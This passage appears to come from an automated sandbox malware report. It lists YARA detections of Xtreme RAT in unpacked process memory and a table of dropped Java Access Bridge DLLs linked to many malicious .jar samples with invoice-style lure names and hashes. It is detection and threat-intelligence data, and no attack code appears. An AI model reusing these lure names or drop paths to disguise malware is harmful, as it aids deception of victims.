5.2.svchost.exe.c80000.6.raw.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
14.1.explorer.exe.1b80000.0.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
14.1.explorer.exe.1b80000.0.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
3.0.server.exe.c80000.0.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
3.0.server.exe.c80000.0.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
15.1.Server.exe.c80000.0.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
15.1.Server.exe.c80000.0.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
34.2.iexplore.exe.c80000.2.raw.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
34.2.iexplore.exe.c80000.2.raw.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
14.1.explorer.exe.1b80000.1.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
14.1.explorer.exe.1b80000.1.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
5.0.svchost.exe.c80000.0.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
5.0.svchost.exe.c80000.0.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
27.0.Server.exe.c80000.1.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
27.0.Server.exe.c80000.1.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
27.0.Server.exe.c80000.0.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
27.0.Server.exe.c80000.0.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
15.0.Server.exe.c80000.2.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
15.0.Server.exe.c80000.2.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
6.2.iexplore.exe.c80000.2.raw.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
6.2.iexplore.exe.c80000.2.raw.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
15.2.Server.exe.c80000.1.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
15.2.Server.exe.c80000.1.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
34.0.iexplore.exe.c80000.0.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
34.0.iexplore.exe.c80000.0.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
15.0.Server.exe.c80000.3.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
15.0.Server.exe.c80000.3.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
5.0.svchost.exe.c80000.0.raw.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
5.0.svchost.exe.c80000.0.raw.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
27.0.Server.exe.c80000.3.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
27.0.Server.exe.c80000.3.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
3.0.server.exe.c80000.3.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
3.0.server.exe.c80000.3.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
34.2.iexplore.exe.c80000.2.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
34.2.iexplore.exe.c80000.2.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
3.0.server.exe.c80000.1.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
3.0.server.exe.c80000.1.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
5.2.svchost.exe.290000.1.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
5.2.svchost.exe.290000.1.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
27.0.Server.exe.c80000.2.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
27.0.Server.exe.c80000.2.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
3.1.server.exe.c80000.0.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
3.1.server.exe.c80000.0.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
5.2.svchost.exe.290000.1.raw.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
5.2.svchost.exe.290000.1.raw.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
6.0.iexplore.exe.c80000.0.raw.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
6.0.iexplore.exe.c80000.0.raw.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll25New Order.jar6dd7e4306bf105e9208151b587a99f0e917605d29a752af8adac7b97f041493cmaliciousBrowse
    49scan_201717067354367.jar0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bdmaliciousBrowse
      73Doc Bidding Tender PO-211411.jar5bab68a60dcc1752510997e1e3d9a5cae7be6623ea223c66b5029a598640c50cmaliciousBrowse
        74Profoma Invoice pdf copy.jarc512fd4a2cfeae199fe87b63eb409d657bab16dd54afeb28f56ee0c1f1c38510maliciousBrowse
          1TT_COPY_A2017030255.jpg.jar0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bdmaliciousBrowse
            97Payment-pdf.jarff860260e27631332f95ff653243f05d791208540afeb3e7a46bcb31b6462fcfmaliciousBrowse
              95April PO.jar1b1dcfc915840c54c876591314c50a47bd4b012c1c8a75c49a892f4a9ca813dcmaliciousBrowse
                69AWBRef38304003993.pdf.jar83d655b68632215cd32af6bd6a6b44aec16709daa9e2009b99a60cdb45c333e1maliciousBrowse
                  98SWIFT.jar92797129f3e958c2fbe33387e751185d2ce58aa5ff0baf59a420717b68070d5fmaliciousBrowse
                    93NEW_INVOICE_ORDER_0948776633.jar14bb1fdc161af6b58b6bef32f91f065bbffcde6b01c6a5a0dc1b4f6eb433fec8maliciousBrowse
                      45Inquiry No. (12157) PI from threeway 1214.jara6995b8c377aa017dc8b2775dd50bb986f4b473bd88238ba27f5130c7244bd9fmaliciousBrowse
                        46Order Specification.jarc3f6672c76f4c0bf73b12f83b268aa6c371eb3c25673c203a4d1382a6a7cf31fmaliciousBrowse
                          77B&L Order No 171022 - Master Mar - MV Northern Juvenile.jareaf5d83198b376be7d3b86675a217c497eb57fda69063f2a5dde58dd3bd0ba37maliciousBrowse
                            89CV.jar8acccee38b0c5f38906561ebffea1d3320bfcd1543bea943fa99794d1cd7cc4fmaliciousBrowse
                              83PO-04217.jar31c6b4f805747bc91473171f4751ebac8a00bb120901ddbce948f07132b5ef39maliciousBrowse
                                179P-39 Oxfam Australia.jarc7b3b91667badeac5e88133fd1bb9a8b19b116c0ca79a9ed890b30b7b07d8f23maliciousBrowse
                                  11previous Quotation.jar8113272d91207f80d3f3f5174cd3e7c6e3ccdc6a8fef6d44cd48442d201873eemaliciousBrowse
                                    83April Order.jarcf2af87daa6da31aa30467a8be83273d9e325f6142581142273c378b97d40e17maliciousBrowse
                                      27TT_COPY_A2017030255.jpg.jar31d398be8f94446f579bde3cb6873279f22ffba20435b7799cd86d7a5db7e05amaliciousBrowse
                                        55documents.pdf.jarb7fb2a1ae8dd7e3dc5594cb02c246e0a6bbae9ec8b3ca0d1355b51f7ea6d0bdfmaliciousBrowse
                                          C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll25New Order.jar6dd7e4306bf105e9208151b587a99f0e917605d29a752af8adac7b97f041493cmaliciousBrowse
                                            49scan_201717067354367.jar0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bdmaliciousBrowse
                                              73Doc Bidding Tender PO-211411.jar5bab68a60dcc1752510997e1e3d9a5cae7be6623ea223c66b5029a598640c50cmaliciousBrowse
                                                74Profoma Invoice pdf copy.jarc512fd4a2cfeae199fe87b63eb409d657bab16dd54afeb28f56ee0c1f1c38510maliciousBrowse
                                                  1TT_COPY_A2017030255.jpg.jar0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bdmaliciousBrowse
                                                    97Payment-pdf.jarff860260e27631332f95ff653243f05d791208540afeb3e7a46bcb31b6462fcfmaliciousBrowse
                                                      95April PO.jar1b1dcfc915840c54c876591314c50a47bd4b012c1c8a75c49a892f4a9ca813dcmaliciousBrowse
                                                        69AWBRef38304003993.pdf.jar83d655b68632215cd32af6bd6a6b44aec16709daa9e2009b99a60cdb45c333e1maliciousBrowse
                                                          98SWIFT.jar92797129f3e958c2fbe33387e751185d2ce58aa5ff0baf59a420717b68070d5fmaliciousBrowse
                                                            93NEW_INVOICE_ORDER_0948776633.jar14bb1fdc161af6b58b6bef32f91f065bbffcde6b01c6a5a0dc1b4f6eb433fec8maliciousBrowse
                                                              45Inquiry No. (12157) PI from threeway 1214.jara6995b8c377aa017dc8b2775dd50bb986f4b473bd88238ba27f5130c7244bd9fmaliciousBrowse
                                                                46Order Specification.jarc3f6672c76f4c0bf73b12f83b268aa6c371eb3c25673c203a4d1382a6a7cf31fmaliciousBrowse
                                                                  77B&L Order No 171022 - Master Mar - MV Northern Juvenile.jareaf5d83198b376be7d3b86675a217c497eb57fda69063f2a5dde58dd3bd0ba37maliciousBrowse
                                                                    89CV.jar8acccee38b0c5f38906561ebffea1d3320bfcd1543bea943fa99794d1cd7cc4fmaliciousBrowse
                                                                      83PO-04217.jar31c6b4f805747bc91473171f4751ebac8a00bb120901ddbce948f07132b5ef39maliciousBrowse
                                                                        179P-39 Oxfam Australia.jarc7b3b91667badeac5e88133fd1bb9a8b19b116c0ca79a9ed890b30b7b07d8f23maliciousBrowse
                                                                          11previous Quotation.jar8113272d91207f80d3f3f5174cd3e7c6e3ccdc6a8fef6d44cd48442d201873eemaliciousBrowse
                                                                            83April Order.jarcf2af87daa6da31aa30467a8be83273d9e325f6142581142273c378b97d40e17maliciousBrowse
                                                                              27TT_COPY_A2017030255.jpg.jar31d398be8f94446f579bde3cb6873279f22ffba20435b7799cd86d7a5db7e05amaliciousBrowse
                                                                                55documents.pdf.jarb7fb2a1ae8dd7e3dc5594cb02c246e0a6bbae9ec8b3ca0d1355b51f7ea6d0bdfmaliciousBrowse
                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll25New Order.jar6dd7e4306bf105e9208151b587a99f0e917605d29a752af8adac7b97f041493cmaliciousBrowse
                                                                                    49scan_201717067354367.jar0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bdmaliciousBrowse
                                                                                      73Doc Bidding Tender PO-211411.jar5bab68a60dcc1752510997e1e3d9a5cae7be6623ea223c66b5029a598640c50cmaliciousBrowse
                                                                                        74Profoma Invoice pdf copy.jarc512fd4a2cfeae199fe87b63eb409d657bab16dd54afeb28f56ee0c1f1c38510maliciousBrowse
                                                                                          1TT_COPY_A2017030255.jpg.jar0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bdmaliciousBrowse
                                                                                            97Payment-pdf.jarff860260e27631332f95ff653243f05d791208540afeb3e7a46bcb31b6462fcfmaliciousBrowse
                                                                                              95April PO.jar1b1dcfc915840c54c876591314c50a47bd4b012c1c8a75c49a892f4a9ca813dcmaliciousBrowse
                                                                                                69AWBRef38304003993.pdf.jar83d655b68632215cd32af6bd6a6b44aec16709daa9e2009b99a60cdb45c333e1maliciousBrowse
                                                                                                  98SWIFT.jar92797129f3e958c2fbe33387e751185d2ce58aa5ff0baf59a420717b68070d5fmaliciousBrowse
                                                                                                    93NEW_INVOICE_ORDER_0948776633.jar14bb1fdc161af6b58b6bef32f91f065bbffcde6b01c6a5a0dc1b4f6eb433fec8maliciousBrowse
                                                                                                      45Inquiry No. (12157) PI from threeway 1214.jara6995b8c377aa017dc8b2775dd50bb986f4b473bd88238ba27f5130c7244bd9fmaliciousBrowse
                                                                                                        46Order Specification.jarc3f6672c76f4c0bf73b12f83b268aa6c371eb3c25673c203a4d1382a6a7cf31fmaliciousBrowse
                                                                                                          77B&L Order No 171022 - Master Mar - MV Northern Juvenile.jareaf5d83198b376be7d3b86675a217c497eb57fda69063f2a5dde58dd3bd0ba37maliciousBrowse
                                                                                                            89CV.jar8acccee38b0c5f38906561ebffea1d3320bfcd1543bea943fa99794d1cd7cc4fmaliciousBrowse
                                                                                                              83PO-04217.jar31c6b4f805747bc91473171f4751ebac8a00bb120901ddbce948f07132b5ef39maliciousBrowse
                                                                                                                179P-39 Oxfam Australia.jarc7b3b91667badeac5e88133fd1bb9a8b19b116c0ca79a9ed890b30b7b07d8f23maliciousBrowse
                                                                                                                  11previous Quotation.jar8113272d91207f80d3f3f5174cd3e7c6e3ccdc6a8fef6d44cd48442d201873eemaliciousBrowse
                                                                                                                    83April Order.jarcf2af87daa6da31aa30467a8be83273d9e325f6142581142273c378b97d40e17maliciousBrowse
                                                                                                                      27TT_COPY_A2017030255.jpg.jar31d398be8f94446f579bde3cb6873279f22ffba20435b7799cd86d7a5db7e05amaliciousBrowse
                                                                                                                        55documents.pdf.jarb7fb2a1ae8dd7e3dc5594cb02c246e0a6bbae9ec8b3ca0d1355b51f7ea6d0bdfmaliciousBrowse

                                                                                                                          Screenshots